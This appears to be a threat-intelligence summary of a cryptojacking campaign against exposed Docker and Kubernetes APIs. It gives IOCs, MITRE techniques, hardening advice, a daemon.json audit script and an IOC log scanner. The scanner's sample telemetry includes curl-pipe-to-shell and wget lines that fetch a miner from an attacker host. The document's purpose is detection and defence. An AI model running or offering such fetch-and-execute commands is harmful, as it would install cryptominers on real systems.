
Summary :
A recent increase in cryptojacking attacks has exploited unsecured Docker and Kubernetes environments, using misconfigurations to gain unauthorized access for cryptocurrency mining. These attacks primarily target high-performance cloud infrastructures, leading to significant operational disruptions. #Cryptojacking #CloudSecurity #Docker
Keypoints :
- Cryptojacking campaigns are exploiting misconfigured Docker and Kubernetes environments.
- Attackers target open API endpoints to deploy malicious containers for cryptocurrency mining.
- Organizations in finance, healthcare, and technology are particularly at risk.
- Defensive strategies include securing APIs, monitoring container activity, and patch management.
MITRE Techniques :
- Linux and Mac File and Directory Permissions Modification (T1222.002): Modifies file and directory permissions to facilitate unauthorized access.
- Cron (T1053.003): Utilizes cron jobs to schedule the execution of malicious scripts.
- SSH (T1021.004): Leverages SSH for lateral movement within the compromised environment.
Indicators of Compromise :
- [ip address] 45.9.148.35
- [ip address] 164.68.106.96
- [ip address] 192.155.94.199
- [ip address] 147.75.47.199
- [file hash] 82874f856a71a751f0bdb1ce7a3b7bb6
- [file hash] e10e3934d7659e00cc7f47b569af9ff5
- [file hash] 505237e566b9e8f4a83edbe45986bbe0e893c1ca4c5837c97c6c4700cfa0930a
- [url] http://45.9.148.35/aws
- [url] http://solscan.live/sh/init.sh
- [url] https://solscan.live/bin/xmrig
- [url] http://solscan.live/sh/xmr.sh.sh
- [url] http://solscan.live/sh/setup_xmr.sh
- [url] http://solscan.live/incoming/docker.php?dockerT=
A recent surge in cryptojacking campaigns has targeted unsecured Docker and Kubernetes environments, exploiting misconfigurations to gain unauthorized access. These attacks leverage open API endpoints in Docker hosts, allowing threat actors to deploy malicious containers designed for cryptocurrency mining, specifically Monero. The campaign primarily targets high-performance cloud infrastructures, draining system resources and leading to significant operational slowdowns for affected organizations.

The attacks underscore the growing trend of resource hijacking in cloud environments, where attackers exploit common deployment misconfigurations. As the campaign evolved, the malware demonstrated advanced lateral movement capabilities, enabling it to infect multiple containers across networks, prolonging the attack and maximizing cryptocurrency mining gains before detection.
Key Attack Techniques
The campaign capitalized on Docker API endpoints exposed over TCP without authentication, which let attackers remotely execute commands and deploy cryptocurrency-mining containers. Once inside, the attackers moved laterally, over SSH according to the observed TTPs (T1021.004), to infect other containers within the same environment, maximizing their control and mining capacity.
Organizations in sectors such as finance, healthcare, and technology, which rely on container-based cloud infrastructures, are at significant risk. These cryptojacking operations can severely impact service performance, drive up costs, and cause major business disruptions.
Defensive Strategies
To mitigate the risk of cryptojacking, organizations should:
- Secure Docker and Kubernetes APIs: The Docker daemon's TCP socket (port 2375 by default) must never be reachable without mutual TLS (tlsverify with a CA, a server certificate and client certificates); prefer the local unix socket, and keep the Kubernetes API server and kubelet ports behind authentication and RBAC rather than exposed to the internet.
- Monitor Container Activity: Alert on containers created through the API from unexpected clients, on sustained CPU saturation, and on outbound connections to the staging hosts and mining-related URLs listed below; the miner shows up as a new, CPU-bound process in a container that did not exist before.
- Limit Resource Usage: Apply CPU and memory limits to every container (docker run --cpus and --memory; Kubernetes LimitRange and ResourceQuota) so that a hijacked workload cannot monopolize the node.
- Patch Management: Regularly update the container runtime, the orchestrator and base images to close known vulnerabilities.
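The first of these controls is the one this campaign actually abuses, so it is worth checking mechanically. The script below is an added example for this page, not SOCRadar's or Docker's own code: it audits a Docker daemon.json for a tcp:// listener that lacks mutual TLS. The two configurations embedded in it are constructed samples (a weak one and a hardened one); the keys it reads ("hosts", "tlsverify", "tlscacert", "tlscert", "tlskey") are real daemon.json options.

```python
"""Audit a Docker daemon.json for the API exposure this campaign abuses.

Added example for this page, not SOCRadar's or Docker's own code. The two
configurations at the bottom are constructed samples.
"""
import json
from urllib.parse import urlsplit

TLS_MATERIAL = ("tlscacert", "tlscert", "tlskey")


def audit_daemon_config(config_text: str) -> list[str]:
    """Return findings for one daemon.json document (empty list = clean).

    A "tcp://" entry in "hosts" without "tlsverify" is the misconfiguration
    the campaign exploits: anyone who can reach the port can call the Docker
    API and start a container as root on the host, with no credentials.
    """
    cfg = json.loads(config_text)
    hosts = cfg.get("hosts", [])
    if isinstance(hosts, str):  # daemon.json also accepts a single string
        hosts = [hosts]
    tls_verify = bool(cfg.get("tlsverify"))
    missing = [k for k in TLS_MATERIAL if not cfg.get(k)]
    findings = []
    for entry in hosts:
        parts = urlsplit(entry)
        if parts.scheme != "tcp":
            continue  # unix:// and fd:// listeners are local to the host
        # "tcp://:2375" has an empty host part and binds every interface
        bind = parts.hostname or "0.0.0.0"
        port = parts.port
        if not tls_verify:
            findings.append(f"{entry}: remote API without tlsverify "
                            f"(no client certificate required on {bind}:{port})")
        elif missing:
            findings.append(f"{entry}: tlsverify set but {', '.join(missing)} missing")
        if bind in ("0.0.0.0", "::") and port == 2375:
            findings.append(f"{entry}: default plaintext port 2375 bound on all interfaces")
    return findings


# Constructed sample: the exposure behind this campaign, API open to anyone
WEAK = json.dumps({
    "hosts": ["unix:///var/run/docker.sock", "tcp://0.0.0.0:2375"],
})

# Constructed sample: same daemon, remote access only with mutual TLS on 2376
HARDENED = json.dumps({
    "hosts": ["unix:///var/run/docker.sock", "tcp://0.0.0.0:2376"],
    "tlsverify": True,
    "tlscacert": "/etc/docker/ca.pem",
    "tlscert": "/etc/docker/server-cert.pem",
    "tlskey": "/etc/docker/server-key.pem",
})

if __name__ == "__main__":
    for name, text in (("weak", WEAK), ("hardened", HARDENED)):
        print(name, audit_daemon_config(text) or ["no findings"])
```

Point it at /etc/docker/daemon.json on each host. One caveat: the same exposure is often introduced with a -H tcp://0.0.0.0:2375 flag in the dockerd command line (typically a systemd unit override) rather than in daemon.json, and the file will then look clean; check the running process arguments and the listening sockets (for example `ps -o args -C dockerd` and `ss -ltnp`) as well, and feed any -H values you find to the same function.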
Indicators of Compromise (IOC) and Techniques (TTP)
| Category | Details |
|---|---|
| IP Addresses | 45.9.148.35, 164.68.106.96, 192.155.94.199, 147.75.47.199 |
| Hashes | 82874f856a71a751f0bdb1ce7a3b7bb6 (MD5), e10e3934d7659e00cc7f47b569af9ff5 (MD5), 505237e566b9e8f4a83edbe45986bbe0e893c1ca4c5837c97c6c4700cfa0930a (SHA-256) |
| URLs | http://45.9.148.35/aws, http://solscan.live/sh/init.sh, https://solscan.live/bin/xmrig |
| TTP (MITRE ATT&CK) | T1222.002: Linux and Mac File and Directory Permissions Modification, T1053.003: Cron, T1021.004: SSH |
| Killchain Stage | Initial Exploitation, Privilege Escalation, Execution, Lateral Movement |
| Malicious Scripts | http://solscan.live/sh/xmr.sh.sh, http://solscan.live/sh/setup_xmr.sh, http://solscan.live/incoming/docker.php?dockerT= |
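The indicators above are only useful once they are matched against telemetry. The script below is an added example for this page, not SOCRadar's code: it carries the IP addresses, URLs and hashes exactly as published here and runs them over log lines. The log lines and the byte string it tests are constructed for illustration. URLs are matched as host plus path so that the generic "/aws" path only fires together with its staging IP.

```python
"""Match this page's published IOCs against host and container telemetry.

Added example for this page, not SOCRadar's code. The IOC values are the ones
listed above; the sample log lines and byte string below are constructed.
"""
import hashlib
import re

IOC_IPS = {"45.9.148.35", "164.68.106.96", "192.155.94.199", "147.75.47.199"}
# Host plus path: "/aws" alone would match far too much, so it needs its IP
IOC_URLS = (
    ("45.9.148.35", "/aws"),
    ("solscan.live", "/sh/init.sh"),
    ("solscan.live", "/bin/xmrig"),
    ("solscan.live", "/sh/xmr.sh.sh"),
    ("solscan.live", "/sh/setup_xmr.sh"),
    ("solscan.live", "/incoming/docker.php"),
)
IOC_HASHES = {
    "82874f856a71a751f0bdb1ce7a3b7bb6",
    "e10e3934d7659e00cc7f47b569af9ff5",
    "505237e566b9e8f4a83edbe45986bbe0e893c1ca4c5837c97c6c4700cfa0930a",
}

IPV4 = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
HEXHASH = re.compile(r"\b[0-9a-f]{64}\b|\b[0-9a-f]{32}\b")


def scan_line(line: str) -> list[tuple[str, str]]:
    """Return (kind, value) hits for one log line, empty list if none."""
    low = line.lower()
    hits = [("ip", ip) for ip in IPV4.findall(line) if ip in IOC_IPS]
    hits += [("url", host + path) for host, path in IOC_URLS
             if host in low and path in low]
    hits += [("hash", h) for h in HEXHASH.findall(low) if h in IOC_HASHES]
    return hits


def scan_lines(lines):
    """Number the lines (from 1) and keep only those with at least one hit."""
    return [(n, hits) for n, line in enumerate(lines, 1)
            if (hits := scan_line(line))]


def matches_known_sample(data: bytes) -> bool:
    """True if a file's MD5 or SHA-256 is one of the published hashes."""
    digests = {hashlib.md5(data).hexdigest(), hashlib.sha256(data).hexdigest()}
    return bool(digests & IOC_HASHES)


# Constructed sample telemetry (not real logs from the campaign)
SAMPLE_LINES = [
    # shell history recovered from a suspect container
    "curl -fsSL http://solscan.live/sh/init.sh | sh",
    "wget -q https://solscan.live/bin/xmrig -O /tmp/.x && chmod +x /tmp/.x",
    # egress proxy record for one of the published IPs
    "CONNECT 45.9.148.35:80 GET /aws 200",
    # benign noise that must not fire
    "apt-get update && apt-get install -y curl",
    "10.0.3.7 GET /healthz 200",
    # hash of a dropped script, as printed by a forensic listing
    "md5 /tmp/init.sh 82874f856a71a751f0bdb1ce7a3b7bb6",
]

if __name__ == "__main__":
    for n, hits in scan_lines(SAMPLE_LINES):
        print(f"line {n}: {hits}")
    print("known sample:", matches_known_sample(b"constructed bytes"))
```

Feed it the command lines of running containers (docker ps --no-trunc), shell history and cron entries recovered from containers, and egress proxy or DNS logs; hash anything found under /tmp or in an unfamiliar image layer with matches_known_sample. Treat the network indicators as the stronger signal: a hash changes with every rebuild of the miner, whereas the same staging host appears in every URL published here.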
This cryptojacking campaign continues to evolve, highlighting the vulnerabilities inherent in container environments. Organizations should prioritize securing cloud-based systems and monitoring for signs of resource hijacking.
In conclusion, this surge in cryptojacking attacks targeting Docker and Kubernetes environments highlights the urgent need for robust cloud security measures. To stay informed about evolving cyber threats, including campaigns similar to this cryptojacking incident, explore other active threats listed on the SOCRadar Campaigns page. Here, you’ll find detailed insights into current cyber campaigns, helping you safeguard your organization against emerging threats.

Full Research: https://socradar.io/blog-cryptojacking-campaign-targets-docker-and-kubernetes-surge-in-container-based-attacks/